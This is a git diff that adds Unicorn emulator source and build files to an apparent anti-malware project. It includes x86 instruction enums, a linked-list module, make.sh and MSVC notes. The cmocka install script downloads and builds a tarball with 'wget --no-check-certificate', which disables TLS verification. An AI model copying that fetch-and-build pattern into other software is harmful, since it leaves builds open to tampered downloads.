UC_X86_INS_VEXTRACTPS, + UC_X86_INS_VFMADD132PD, + UC_X86_INS_VFMADD132PS, + UC_X86_INS_VFMADDPD, + UC_X86_INS_VFMADD213PD, + UC_X86_INS_VFMADD231PD, + UC_X86_INS_VFMADDPS, + UC_X86_INS_VFMADD213PS, + UC_X86_INS_VFMADD231PS, + UC_X86_INS_VFMADDSD, + UC_X86_INS_VFMADD213SD, + UC_X86_INS_VFMADD132SD, + UC_X86_INS_VFMADD231SD, + UC_X86_INS_VFMADDSS, + UC_X86_INS_VFMADD213SS, + UC_X86_INS_VFMADD132SS, + UC_X86_INS_VFMADD231SS, + UC_X86_INS_VFMADDSUB132PD, + UC_X86_INS_VFMADDSUB132PS, + UC_X86_INS_VFMADDSUBPD, + UC_X86_INS_VFMADDSUB213PD, + UC_X86_INS_VFMADDSUB231PD, + UC_X86_INS_VFMADDSUBPS, + UC_X86_INS_VFMADDSUB213PS, + UC_X86_INS_VFMADDSUB231PS, + UC_X86_INS_VFMSUB132PD, + UC_X86_INS_VFMSUB132PS, + UC_X86_INS_VFMSUBADD132PD, + UC_X86_INS_VFMSUBADD132PS, + UC_X86_INS_VFMSUBADDPD, + UC_X86_INS_VFMSUBADD213PD, + UC_X86_INS_VFMSUBADD231PD, + UC_X86_INS_VFMSUBADDPS, + UC_X86_INS_VFMSUBADD213PS, + UC_X86_INS_VFMSUBADD231PS, + UC_X86_INS_VFMSUBPD, + UC_X86_INS_VFMSUB213PD, + UC_X86_INS_VFMSUB231PD, + UC_X86_INS_VFMSUBPS, + UC_X86_INS_VFMSUB213PS, + UC_X86_INS_VFMSUB231PS, + UC_X86_INS_VFMSUBSD, + UC_X86_INS_VFMSUB213SD, + UC_X86_INS_VFMSUB132SD, + UC_X86_INS_VFMSUB231SD, + UC_X86_INS_VFMSUBSS, + UC_X86_INS_VFMSUB213SS, + UC_X86_INS_VFMSUB132SS, + UC_X86_INS_VFMSUB231SS, + UC_X86_INS_VFNMADD132PD, + UC_X86_INS_VFNMADD132PS, + UC_X86_INS_VFNMADDPD, + UC_X86_INS_VFNMADD213PD, + UC_X86_INS_VFNMADD231PD, + UC_X86_INS_VFNMADDPS, + UC_X86_INS_VFNMADD213PS, + UC_X86_INS_VFNMADD231PS, + UC_X86_INS_VFNMADDSD, + UC_X86_INS_VFNMADD213SD, + UC_X86_INS_VFNMADD132SD, + UC_X86_INS_VFNMADD231SD, + UC_X86_INS_VFNMADDSS, + UC_X86_INS_VFNMADD213SS, + UC_X86_INS_VFNMADD132SS, + UC_X86_INS_VFNMADD231SS, + UC_X86_INS_VFNMSUB132PD, + UC_X86_INS_VFNMSUB132PS, + UC_X86_INS_VFNMSUBPD, + UC_X86_INS_VFNMSUB213PD, + UC_X86_INS_VFNMSUB231PD, + UC_X86_INS_VFNMSUBPS, + UC_X86_INS_VFNMSUB213PS, + UC_X86_INS_VFNMSUB231PS, + UC_X86_INS_VFNMSUBSD, + UC_X86_INS_VFNMSUB213SD, + UC_X86_INS_VFNMSUB132SD, + UC_X86_INS_VFNMSUB231SD, + UC_X86_INS_VFNMSUBSS, + UC_X86_INS_VFNMSUB213SS, + UC_X86_INS_VFNMSUB132SS, + UC_X86_INS_VFNMSUB231SS, + UC_X86_INS_VFRCZPD, + UC_X86_INS_VFRCZPS, + UC_X86_INS_VFRCZSD, + UC_X86_INS_VFRCZSS, + UC_X86_INS_VORPD, + UC_X86_INS_VORPS, + UC_X86_INS_VXORPD, + UC_X86_INS_VXORPS, + UC_X86_INS_VGATHERDPD, + UC_X86_INS_VGATHERDPS, + UC_X86_INS_VGATHERPF0DPD, + UC_X86_INS_VGATHERPF0DPS, + UC_X86_INS_VGATHERPF0QPD, + UC_X86_INS_VGATHERPF0QPS, + UC_X86_INS_VGATHERPF1DPD, + UC_X86_INS_VGATHERPF1DPS, + UC_X86_INS_VGATHERPF1QPD, + UC_X86_INS_VGATHERPF1QPS, + UC_X86_INS_VGATHERQPD, + UC_X86_INS_VGATHERQPS, + UC_X86_INS_VHADDPD, + UC_X86_INS_VHADDPS, + UC_X86_INS_VHSUBPD, + UC_X86_INS_VHSUBPS, + UC_X86_INS_VINSERTF128, + UC_X86_INS_VINSERTF32X4, + UC_X86_INS_VINSERTF32X8, + UC_X86_INS_VINSERTF64X2, + UC_X86_INS_VINSERTF64X4, + UC_X86_INS_VINSERTI128, + UC_X86_INS_VINSERTI32X4, + UC_X86_INS_VINSERTI32X8, + UC_X86_INS_VINSERTI64X2, + UC_X86_INS_VINSERTI64X4, + UC_X86_INS_VINSERTPS, + UC_X86_INS_VLDDQU, + UC_X86_INS_VLDMXCSR, + UC_X86_INS_VMASKMOVDQU, + UC_X86_INS_VMASKMOVPD, + UC_X86_INS_VMASKMOVPS, + UC_X86_INS_VMAXPD, + UC_X86_INS_VMAXPS, + UC_X86_INS_VMAXSD, + UC_X86_INS_VMAXSS, + UC_X86_INS_VMCALL, + UC_X86_INS_VMCLEAR, + UC_X86_INS_VMFUNC, + UC_X86_INS_VMINPD, + UC_X86_INS_VMINPS, + UC_X86_INS_VMINSD, + UC_X86_INS_VMINSS, + UC_X86_INS_VMLAUNCH, + UC_X86_INS_VMLOAD, + UC_X86_INS_VMMCALL, + UC_X86_INS_VMOVQ, + UC_X86_INS_VMOVDDUP, + UC_X86_INS_VMOVD, + UC_X86_INS_VMOVDQA32, + UC_X86_INS_VMOVDQA64, + UC_X86_INS_VMOVDQA, + UC_X86_INS_VMOVDQU16, + UC_X86_INS_VMOVDQU32, + UC_X86_INS_VMOVDQU64, + UC_X86_INS_VMOVDQU8, + UC_X86_INS_VMOVDQU, + UC_X86_INS_VMOVHLPS, + UC_X86_INS_VMOVHPD, + UC_X86_INS_VMOVHPS, + UC_X86_INS_VMOVLHPS, + UC_X86_INS_VMOVLPD, + UC_X86_INS_VMOVLPS, + UC_X86_INS_VMOVMSKPD, + UC_X86_INS_VMOVMSKPS, + UC_X86_INS_VMOVNTDQA, + UC_X86_INS_VMOVNTDQ, + UC_X86_INS_VMOVNTPD, + UC_X86_INS_VMOVNTPS, + UC_X86_INS_VMOVSD, + UC_X86_INS_VMOVSHDUP, + UC_X86_INS_VMOVSLDUP, + UC_X86_INS_VMOVSS, + UC_X86_INS_VMOVUPD, + UC_X86_INS_VMOVUPS, + UC_X86_INS_VMPSADBW, + UC_X86_INS_VMPTRLD, + UC_X86_INS_VMPTRST, + UC_X86_INS_VMREAD, + UC_X86_INS_VMRESUME, + UC_X86_INS_VMRUN, + UC_X86_INS_VMSAVE, + UC_X86_INS_VMULPD, + UC_X86_INS_VMULPS, + UC_X86_INS_VMULSD, + UC_X86_INS_VMULSS, + UC_X86_INS_VMWRITE, + UC_X86_INS_VMXOFF, + UC_X86_INS_VMXON, + UC_X86_INS_VPABSB, + UC_X86_INS_VPABSD, + UC_X86_INS_VPABSQ, + UC_X86_INS_VPABSW, + UC_X86_INS_VPACKSSDW, + UC_X86_INS_VPACKSSWB, + UC_X86_INS_VPACKUSDW, + UC_X86_INS_VPACKUSWB, + UC_X86_INS_VPADDB, + UC_X86_INS_VPADDD, + UC_X86_INS_VPADDQ, + UC_X86_INS_VPADDSB, + UC_X86_INS_VPADDSW, + UC_X86_INS_VPADDUSB, + UC_X86_INS_VPADDUSW, + UC_X86_INS_VPADDW, + UC_X86_INS_VPALIGNR, + UC_X86_INS_VPANDD, + UC_X86_INS_VPANDND, + UC_X86_INS_VPANDNQ, + UC_X86_INS_VPANDN, + UC_X86_INS_VPANDQ, + UC_X86_INS_VPAND, + UC_X86_INS_VPAVGB, + UC_X86_INS_VPAVGW, + UC_X86_INS_VPBLENDD, + UC_X86_INS_VPBLENDMB, + UC_X86_INS_VPBLENDMD, + UC_X86_INS_VPBLENDMQ, + UC_X86_INS_VPBLENDMW, + UC_X86_INS_VPBLENDVB, + UC_X86_INS_VPBLENDW, + UC_X86_INS_VPBROADCASTB, + UC_X86_INS_VPBROADCASTD, + UC_X86_INS_VPBROADCASTMB2Q, + UC_X86_INS_VPBROADCASTMW2D, + UC_X86_INS_VPBROADCASTQ, + UC_X86_INS_VPBROADCASTW, + UC_X86_INS_VPCLMULQDQ, + UC_X86_INS_VPCMOV, + UC_X86_INS_VPCMPB, + UC_X86_INS_VPCMPD, + UC_X86_INS_VPCMPEQB, + UC_X86_INS_VPCMPEQD, + UC_X86_INS_VPCMPEQQ, + UC_X86_INS_VPCMPEQW, + UC_X86_INS_VPCMPESTRI, + UC_X86_INS_VPCMPESTRM, + UC_X86_INS_VPCMPGTB, + UC_X86_INS_VPCMPGTD, + UC_X86_INS_VPCMPGTQ, + UC_X86_INS_VPCMPGTW, + UC_X86_INS_VPCMPISTRI, + UC_X86_INS_VPCMPISTRM, + UC_X86_INS_VPCMPQ, + UC_X86_INS_VPCMPUB, + UC_X86_INS_VPCMPUD, + UC_X86_INS_VPCMPUQ, + UC_X86_INS_VPCMPUW, + UC_X86_INS_VPCMPW, + UC_X86_INS_VPCOMB, + UC_X86_INS_VPCOMD, + UC_X86_INS_VPCOMPRESSD, + UC_X86_INS_VPCOMPRESSQ, + UC_X86_INS_VPCOMQ, + UC_X86_INS_VPCOMUB, + UC_X86_INS_VPCOMUD, + UC_X86_INS_VPCOMUQ, + UC_X86_INS_VPCOMUW, + UC_X86_INS_VPCOMW, + UC_X86_INS_VPCONFLICTD, + UC_X86_INS_VPCONFLICTQ, + UC_X86_INS_VPERM2F128, + UC_X86_INS_VPERM2I128, + UC_X86_INS_VPERMD, + UC_X86_INS_VPERMI2D, + UC_X86_INS_VPERMI2PD, + UC_X86_INS_VPERMI2PS, + UC_X86_INS_VPERMI2Q, + UC_X86_INS_VPERMIL2PD, + UC_X86_INS_VPERMIL2PS, + UC_X86_INS_VPERMILPD, + UC_X86_INS_VPERMILPS, + UC_X86_INS_VPERMPD, + UC_X86_INS_VPERMPS, + UC_X86_INS_VPERMQ, + UC_X86_INS_VPERMT2D, + UC_X86_INS_VPERMT2PD, + UC_X86_INS_VPERMT2PS, + UC_X86_INS_VPERMT2Q, + UC_X86_INS_VPEXPANDD, + UC_X86_INS_VPEXPANDQ, + UC_X86_INS_VPEXTRB, + UC_X86_INS_VPEXTRD, + UC_X86_INS_VPEXTRQ, + UC_X86_INS_VPEXTRW, + UC_X86_INS_VPGATHERDD, + UC_X86_INS_VPGATHERDQ, + UC_X86_INS_VPGATHERQD, + UC_X86_INS_VPGATHERQQ, + UC_X86_INS_VPHADDBD, + UC_X86_INS_VPHADDBQ, + UC_X86_INS_VPHADDBW, + UC_X86_INS_VPHADDDQ, + UC_X86_INS_VPHADDD, + UC_X86_INS_VPHADDSW, + UC_X86_INS_VPHADDUBD, + UC_X86_INS_VPHADDUBQ, + UC_X86_INS_VPHADDUBW, + UC_X86_INS_VPHADDUDQ, + UC_X86_INS_VPHADDUWD, + UC_X86_INS_VPHADDUWQ, + UC_X86_INS_VPHADDWD, + UC_X86_INS_VPHADDWQ, + UC_X86_INS_VPHADDW, + UC_X86_INS_VPHMINPOSUW, + UC_X86_INS_VPHSUBBW, + UC_X86_INS_VPHSUBDQ, + UC_X86_INS_VPHSUBD, + UC_X86_INS_VPHSUBSW, + UC_X86_INS_VPHSUBWD, + UC_X86_INS_VPHSUBW, + UC_X86_INS_VPINSRB, + UC_X86_INS_VPINSRD, + UC_X86_INS_VPINSRQ, + UC_X86_INS_VPINSRW, + UC_X86_INS_VPLZCNTD, + UC_X86_INS_VPLZCNTQ, + UC_X86_INS_VPMACSDD, + UC_X86_INS_VPMACSDQH, + UC_X86_INS_VPMACSDQL, + UC_X86_INS_VPMACSSDD, + UC_X86_INS_VPMACSSDQH, + UC_X86_INS_VPMACSSDQL, + UC_X86_INS_VPMACSSWD, + UC_X86_INS_VPMACSSWW, + UC_X86_INS_VPMACSWD, + UC_X86_INS_VPMACSWW, + UC_X86_INS_VPMADCSSWD, + UC_X86_INS_VPMADCSWD, + UC_X86_INS_VPMADDUBSW, + UC_X86_INS_VPMADDWD, + UC_X86_INS_VPMASKMOVD, + UC_X86_INS_VPMASKMOVQ, + UC_X86_INS_VPMAXSB, + UC_X86_INS_VPMAXSD, + UC_X86_INS_VPMAXSQ, + UC_X86_INS_VPMAXSW, + UC_X86_INS_VPMAXUB, + UC_X86_INS_VPMAXUD, + UC_X86_INS_VPMAXUQ, + UC_X86_INS_VPMAXUW, + UC_X86_INS_VPMINSB, + UC_X86_INS_VPMINSD, + UC_X86_INS_VPMINSQ, + UC_X86_INS_VPMINSW, + UC_X86_INS_VPMINUB, + UC_X86_INS_VPMINUD, + UC_X86_INS_VPMINUQ, + UC_X86_INS_VPMINUW, + UC_X86_INS_VPMOVDB, + UC_X86_INS_VPMOVDW, + UC_X86_INS_VPMOVM2B, + UC_X86_INS_VPMOVM2D, + UC_X86_INS_VPMOVM2Q, + UC_X86_INS_VPMOVM2W, + UC_X86_INS_VPMOVMSKB, + UC_X86_INS_VPMOVQB, + UC_X86_INS_VPMOVQD, + UC_X86_INS_VPMOVQW, + UC_X86_INS_VPMOVSDB, + UC_X86_INS_VPMOVSDW, + UC_X86_INS_VPMOVSQB, + UC_X86_INS_VPMOVSQD, + UC_X86_INS_VPMOVSQW, + UC_X86_INS_VPMOVSXBD, + UC_X86_INS_VPMOVSXBQ, + UC_X86_INS_VPMOVSXBW, + UC_X86_INS_VPMOVSXDQ, + UC_X86_INS_VPMOVSXWD, + UC_X86_INS_VPMOVSXWQ, + UC_X86_INS_VPMOVUSDB, + UC_X86_INS_VPMOVUSDW, + UC_X86_INS_VPMOVUSQB, + UC_X86_INS_VPMOVUSQD, + UC_X86_INS_VPMOVUSQW, + UC_X86_INS_VPMOVZXBD, + UC_X86_INS_VPMOVZXBQ, + UC_X86_INS_VPMOVZXBW, + UC_X86_INS_VPMOVZXDQ, + UC_X86_INS_VPMOVZXWD, + UC_X86_INS_VPMOVZXWQ, + UC_X86_INS_VPMULDQ, + UC_X86_INS_VPMULHRSW, + UC_X86_INS_VPMULHUW, + UC_X86_INS_VPMULHW, + UC_X86_INS_VPMULLD, + UC_X86_INS_VPMULLQ, + UC_X86_INS_VPMULLW, + UC_X86_INS_VPMULUDQ, + UC_X86_INS_VPORD, + UC_X86_INS_VPORQ, + UC_X86_INS_VPOR, + UC_X86_INS_VPPERM, + UC_X86_INS_VPROTB, + UC_X86_INS_VPROTD, + UC_X86_INS_VPROTQ, + UC_X86_INS_VPROTW, + UC_X86_INS_VPSADBW, + UC_X86_INS_VPSCATTERDD, + UC_X86_INS_VPSCATTERDQ, + UC_X86_INS_VPSCATTERQD, + UC_X86_INS_VPSCATTERQQ, + UC_X86_INS_VPSHAB, + UC_X86_INS_VPSHAD, + UC_X86_INS_VPSHAQ, + UC_X86_INS_VPSHAW, + UC_X86_INS_VPSHLB, + UC_X86_INS_VPSHLD, + UC_X86_INS_VPSHLQ, + UC_X86_INS_VPSHLW, + UC_X86_INS_VPSHUFB, + UC_X86_INS_VPSHUFD, + UC_X86_INS_VPSHUFHW, + UC_X86_INS_VPSHUFLW, + UC_X86_INS_VPSIGNB, + UC_X86_INS_VPSIGND, + UC_X86_INS_VPSIGNW, + UC_X86_INS_VPSLLDQ, + UC_X86_INS_VPSLLD, + UC_X86_INS_VPSLLQ, + UC_X86_INS_VPSLLVD, + UC_X86_INS_VPSLLVQ, + UC_X86_INS_VPSLLW, + UC_X86_INS_VPSRAD, + UC_X86_INS_VPSRAQ, + UC_X86_INS_VPSRAVD, + UC_X86_INS_VPSRAVQ, + UC_X86_INS_VPSRAW, + UC_X86_INS_VPSRLDQ, + UC_X86_INS_VPSRLD, + UC_X86_INS_VPSRLQ, + UC_X86_INS_VPSRLVD, + UC_X86_INS_VPSRLVQ, + UC_X86_INS_VPSRLW, + UC_X86_INS_VPSUBB, + UC_X86_INS_VPSUBD, + UC_X86_INS_VPSUBQ, + UC_X86_INS_VPSUBSB, + UC_X86_INS_VPSUBSW, + UC_X86_INS_VPSUBUSB, + UC_X86_INS_VPSUBUSW, + UC_X86_INS_VPSUBW, + UC_X86_INS_VPTESTMD, + UC_X86_INS_VPTESTMQ, + UC_X86_INS_VPTESTNMD, + UC_X86_INS_VPTESTNMQ, + UC_X86_INS_VPTEST, + UC_X86_INS_VPUNPCKHBW, + UC_X86_INS_VPUNPCKHDQ, + UC_X86_INS_VPUNPCKHQDQ, + UC_X86_INS_VPUNPCKHWD, + UC_X86_INS_VPUNPCKLBW, + UC_X86_INS_VPUNPCKLDQ, + UC_X86_INS_VPUNPCKLQDQ, + UC_X86_INS_VPUNPCKLWD, + UC_X86_INS_VPXORD, + UC_X86_INS_VPXORQ, + UC_X86_INS_VPXOR, + UC_X86_INS_VRCP14PD, + UC_X86_INS_VRCP14PS, + UC_X86_INS_VRCP14SD, + UC_X86_INS_VRCP14SS, + UC_X86_INS_VRCP28PD, + UC_X86_INS_VRCP28PS, + UC_X86_INS_VRCP28SD, + UC_X86_INS_VRCP28SS, + UC_X86_INS_VRCPPS, + UC_X86_INS_VRCPSS, + UC_X86_INS_VRNDSCALEPD, + UC_X86_INS_VRNDSCALEPS, + UC_X86_INS_VRNDSCALESD, + UC_X86_INS_VRNDSCALESS, + UC_X86_INS_VROUNDPD, + UC_X86_INS_VROUNDPS, + UC_X86_INS_VROUNDSD, + UC_X86_INS_VROUNDSS, + UC_X86_INS_VRSQRT14PD, + UC_X86_INS_VRSQRT14PS, + UC_X86_INS_VRSQRT14SD, + UC_X86_INS_VRSQRT14SS, + UC_X86_INS_VRSQRT28PD, + UC_X86_INS_VRSQRT28PS, + UC_X86_INS_VRSQRT28SD, + UC_X86_INS_VRSQRT28SS, + UC_X86_INS_VRSQRTPS, + UC_X86_INS_VRSQRTSS, + UC_X86_INS_VSCATTERDPD, + UC_X86_INS_VSCATTERDPS, + UC_X86_INS_VSCATTERPF0DPD, + UC_X86_INS_VSCATTERPF0DPS, + UC_X86_INS_VSCATTERPF0QPD, + UC_X86_INS_VSCATTERPF0QPS, + UC_X86_INS_VSCATTERPF1DPD, + UC_X86_INS_VSCATTERPF1DPS, + UC_X86_INS_VSCATTERPF1QPD, + UC_X86_INS_VSCATTERPF1QPS, + UC_X86_INS_VSCATTERQPD, + UC_X86_INS_VSCATTERQPS, + UC_X86_INS_VSHUFPD, + UC_X86_INS_VSHUFPS, + UC_X86_INS_VSQRTPD, + UC_X86_INS_VSQRTPS, + UC_X86_INS_VSQRTSD, + UC_X86_INS_VSQRTSS, + UC_X86_INS_VSTMXCSR, + UC_X86_INS_VSUBPD, + UC_X86_INS_VSUBPS, + UC_X86_INS_VSUBSD, + UC_X86_INS_VSUBSS, + UC_X86_INS_VTESTPD, + UC_X86_INS_VTESTPS, + UC_X86_INS_VUNPCKHPD, + UC_X86_INS_VUNPCKHPS, + UC_X86_INS_VUNPCKLPD, + UC_X86_INS_VUNPCKLPS, + UC_X86_INS_VZEROALL, + UC_X86_INS_VZEROUPPER, + UC_X86_INS_WAIT, + UC_X86_INS_WBINVD, + UC_X86_INS_WRFSBASE, + UC_X86_INS_WRGSBASE, + UC_X86_INS_WRMSR, + UC_X86_INS_XABORT, + UC_X86_INS_XACQUIRE, + UC_X86_INS_XBEGIN, + UC_X86_INS_XCHG, + UC_X86_INS_XCRYPTCBC, + UC_X86_INS_XCRYPTCFB, + UC_X86_INS_XCRYPTCTR, + UC_X86_INS_XCRYPTECB, + UC_X86_INS_XCRYPTOFB, + UC_X86_INS_XEND, + UC_X86_INS_XGETBV, + UC_X86_INS_XLATB, + UC_X86_INS_XRELEASE, + UC_X86_INS_XRSTOR, + UC_X86_INS_XRSTOR64, + UC_X86_INS_XRSTORS, + UC_X86_INS_XRSTORS64, + UC_X86_INS_XSAVE, + UC_X86_INS_XSAVE64, + UC_X86_INS_XSAVEC, + UC_X86_INS_XSAVEC64, + UC_X86_INS_XSAVEOPT, + UC_X86_INS_XSAVEOPT64, + UC_X86_INS_XSAVES, + UC_X86_INS_XSAVES64, + UC_X86_INS_XSETBV, + UC_X86_INS_XSHA1, + UC_X86_INS_XSHA256, + UC_X86_INS_XSTORE, + UC_X86_INS_XTEST, + UC_X86_INS_FDISI8087_NOP, + UC_X86_INS_FENI8087_NOP, + + UC_X86_INS_ENDING, // mark the end of the list of insn +} uc_x86_insn; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/install-cmocka-linux.sh b/ai_anti_malware/unicorn/unicorn-master/install-cmocka-linux.sh new file mode 100644 index 0000000..85b2a12 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/install-cmocka-linux.sh @@ -0,0 +1,12 @@ +#!/bin/sh -ex +mkdir -p cmocka +#wget https://cmocka.org/files/1.1/cmocka-1.1.0.tar.xz -O /tmp/cmocka-1.1.0.tar.xz +wget --no-check-certificate https://cmocka.org/files/1.1/cmocka-1.1.1.tar.xz -P /tmp/ +tar -xf /tmp/cmocka-1.1.1.tar.xz -C /tmp +cd cmocka && cmake -DUNIT_TESTING=On /tmp/cmocka-1.1.1 && make && make test +# cmake builds an so instead of a dll in mingw/msys +if [[ ! -z $MSYSTEM ]]; then +cp src/cmocka.so src/cmocka.dll +fi +# cmocka does not include headers in build +cp -R /tmp/cmocka-1.1.1/include/ . diff --git a/ai_anti_malware/unicorn/unicorn-master/list.c b/ai_anti_malware/unicorn/unicorn-master/list.c new file mode 100644 index 0000000..164efcb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/list.c @@ -0,0 +1,111 @@ +#include <stdlib.h> +#include "unicorn/platform.h" +#include "list.h" + +// simple linked list implementation + +struct list *list_new(void) +{ + return calloc(1, sizeof(struct list)); +} + +// removed linked list nodes but does not free their content +void list_clear(struct list *list) +{ + struct list_item *next, *cur = list->head; + while (cur != NULL) { + next = cur->next; + free(cur); + cur = next; + } + list->head = NULL; + list->tail = NULL; +} + +// insert a new item at the begin of the list. +// returns generated linked list node, or NULL on failure +void *list_insert(struct list *list, void *data) +{ + struct list_item *item = malloc(sizeof(struct list_item)); + if (item == NULL) { + return NULL; + } + + item->data = data; + item->next = list->head; + + if (list->tail == NULL) { + list->tail = item; + } + + list->head = item; + + return item; +} + +// append a new item at the end of the list. +// returns generated linked list node, or NULL on failure +void *list_append(struct list *list, void *data) +{ + struct list_item *item = malloc(sizeof(struct list_item)); + if (item == NULL) { + return NULL; + } + item->next = NULL; + item->data = data; + if (list->head == NULL) { + list->head = item; + } else { + list->tail->next = item; + } + list->tail = item; + return item; +} + +// returns true if entry was removed, false otherwise +bool list_remove(struct list *list, void *data) +{ + struct list_item *next, *cur, *prev = NULL; + // is list empty? + if (list->head == NULL) { + return false; + } + cur = list->head; + while (cur != NULL) { + next = cur->next; + if (cur->data == data) { + if (cur == list->head) { + list->head = next; + } else { + prev->next = next; + } + if (cur == list->tail) { + list->tail = prev; + } + free(cur); + return true; + } + prev = cur; + cur = next; + } + return false; +} + +// returns true if the data exists in the list +bool list_exists(struct list *list, void *data) +{ + struct list_item *next, *cur = NULL; + // is list empty? + if (list->head == NULL) { + return false; + } + cur = list->head; + while (cur != NULL) { + next = cur->next; + if (cur->data == data) { + return true; + } + cur = next; + } + return false; +} \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/make.sh b/ai_anti_malware/unicorn/unicorn-master/make.sh new file mode 100644 index 0000000..3b876de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/make.sh @@ -0,0 +1,138 @@ +#!/bin/sh + +# Unicorn Engine +# By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 + +usage() { + cat 1>&2 <<EOF +make.sh - The build script for unicorn engine +USAGE: + $ ./make.sh [OPTIONS] +OPTIONS: + Build the project + asan Build for ASan + install Install the project + uninstall Uninstall the project + macos-universal Build universal binaries on macOS + macos-universal-no Build non-universal binaries that includes only 64-bit code on macOS + cross-win32 Cross-compile Windows 32-bit binary with MinGW + cross-win64 Cross-compile Windows 64-bit binary with MinGW + cross-android_arm Cross-compile for Android Arm + cross-android_arm64 Cross-compile for Android Arm64 + linux32 Cross-compile Unicorn on 64-bit Linux to target 32-bit binary + msvc_update_genfiles Generate files for MSVC projects +EOF +} + +MAKE_JOBS=$((MAKE_JOBS+0)) +[ ${MAKE_JOBS} -lt 1 ] && \ + MAKE_JOBS=4 + +# build for ASAN +asan() { + env UNICORN_DEBUG=yes UNICORN_ASAN=yes "${MAKE}" V=1 +} + +build_cross() { + [ "$UNAME" = Darwin ] && LIBARCHS="i386 x86_64" + CROSS=$1 + CC=$CROSS-gcc \ + AR=$CROSS-gcc-ar \ + RANLIB=$CROSS-gcc-ranlib \ + ${MAKE} +} + +build_linux32() { + PKG_CONFIG_PATH="/usr/lib/i386-linux-gnu/pkgconfig" \ + CFLAGS=-m32 \ + LDFLAGS=-m32 \ + LDFLAGS_STATIC=-m32 \ + LIBRARY_PATH="/usr/lib/i386-linux-gnu" \ + UNICORN_QEMU_FLAGS="--cpu=i386 ${UNICORN_QEMU_FLAGS}" \ + ${MAKE} +} + +install() { + # Mac OSX needs to find the right directory for pkgconfig + if [ "$UNAME" = Darwin ]; then + # we are going to install into /usr/local, so remove old installs under /usr + rm -rf /usr/lib/libunicorn* + rm -rf /usr/include/unicorn + # install into /usr/local + PREFIX=${PREFIX:-/usr/local} + ${MAKE} install + else # not OSX + test -d /usr/lib64 && LIBDIRARCH=lib64 + ${MAKE} install + fi +} + +uninstall() { + # Mac OSX needs to find the right directory for pkgconfig + if [ "$UNAME" = "Darwin" ]; then + # find the directory automatically, so we can support both Macport & Brew + PKGCFGDIR="$(pkg-config --variable pc_path pkg-config | cut -d ':' -f 1)" + PREFIX=${PREFIX:-/usr/local} + ${MAKE} uninstall + else # not OSX + test -d /usr/lib64 && LIBDIRARCH=lib64 + ${MAKE} uninstall + fi +} + +msvc_update_genfiles() { + ${MAKE} + cp qemu/qapi-types.h msvc/unicorn/qapi-types.h + cp qemu/qapi-visit.h msvc/unicorn/qapi-visit.h + cp qemu/qapi-types.c msvc/unicorn/qapi-types.c + cp qemu/qapi-visit.c msvc/unicorn/qapi-visit.c + cp qemu/config-host.h msvc/unicorn/config-host.h + cp qemu/aarch64-softmmu/config-target.h msvc/unicorn/aarch64-softmmu/config-target.h + cp qemu/aarch64eb-softmmu/config-target.h msvc/unicorn/aarch64eb-softmmu/config-target.h + cp qemu/arm-softmmu/config-target.h msvc/unicorn/arm-softmmu/config-target.h + cp qemu/armeb-softmmu/config-target.h msvc/unicorn/armeb-softmmu/config-target.h + cp qemu/m68k-softmmu/config-target.h msvc/unicorn/m68k-softmmu/config-target.h + cp qemu/mips64el-softmmu/config-target.h msvc/unicorn/mips64el-softmmu/config-target.h + cp qemu/mips64-softmmu/config-target.h msvc/unicorn/mips64-softmmu/config-target.h + cp qemu/mipsel-softmmu/config-target.h msvc/unicorn/mipsel-softmmu/config-target.h + cp qemu/mips-softmmu/config-target.h msvc/unicorn/mips-softmmu/config-target.h + cp qemu/sparc64-softmmu/config-target.h msvc/unicorn/sparc64-softmmu/config-target.h + cp qemu/sparc-softmmu/config-target.h msvc/unicorn/sparc-softmmu/config-target.h + cp qemu/x86_64-softmmu/config-target.h msvc/unicorn/x86_64-softmmu/config-target.h +} + +UNAME=${UNAME:-$(uname)} +MAKE=${MAKE:-make} +#[ -n "${MAKE_JOBS}" ] && MAKE="$MAKE -j${MAKE_JOBS}" + + +if [ "$UNAME" = SunOS ]; then + MAKE=${MAKE:-gmake} + INSTALL_BIN=ginstall + CC=gcc +fi + +if echo "$UNAME" | grep -q BSD; then + MAKE=gmake + PREFIX=${PREFIX:-/usr/local} +fi + +export CC INSTALL_BIN PREFIX PKGCFGDIR LIBDIRARCH LIBARCHS CFLAGS LDFLAGS + +case "$1" in + "" ) ${MAKE};; + "asan" ) asan;; + "install" ) install;; + "uninstall" ) uninstall;; + "macos-universal" ) MACOS_UNIVERSAL=yes ${MAKE};; + "macos-universal-no" ) MACOS_UNIVERSAL=no ${MAKE};; + "cross-win32" ) build_cross i686-w64-mingw32;; + "cross-win64" ) build_cross x86_64-w64-mingw32;; + "cross-android_arm" ) CROSS=arm-linux-androideabi ${MAKE};; + "cross-android_arm64" ) CROSS=aarch64-linux-android ${MAKE};; + "linux32" ) build_linux32;; + "msvc_update_genfiles" ) msvc_update_genfiles;; + * ) + usage; + exit 1;; +esac diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc.bat b/ai_anti_malware/unicorn/unicorn-master/msvc.bat new file mode 100644 index 0000000..285ea92 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc.bat @@ -0,0 +1,3 @@ +:: build Unicorn MSVC solution from MSVC prompt + +msbuild msvc/unicorn.sln diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/.gitignore b/ai_anti_malware/unicorn/unicorn-master/msvc/.gitignore new file mode 100644 index 0000000..6b23e35 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/.gitignore @@ -0,0 +1,3 @@ +unicorn.VC.VC.opendb +unicorn.VC.db +distro diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/README.TXT b/ai_anti_malware/unicorn/unicorn-master/msvc/README.TXT new file mode 100644 index 0000000..7853b8d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/README.TXT @@ -0,0 +1,273 @@ +Unicorn-Engine MSVC Native Port Notes + +Zak Escano - January 2017 + +These notes are to help myself and others with the upkeep of the msvc native port +of unicorn-engine. + + +:: Command line build instructions + + msbuild -m -p:Configuration=Release -p:Platform=Win32 + msbuild -m -p:Configuration=Release -p:Platform=x64 + +Then bundle and release the folder "distro". + + +:: Build settings + +Visual Studio Version: Visual Studio 2017 v15.9.15 +Platform Toolset: Default. Known to work with the 8.1 SDK +Character Set: Use Multi-Byte 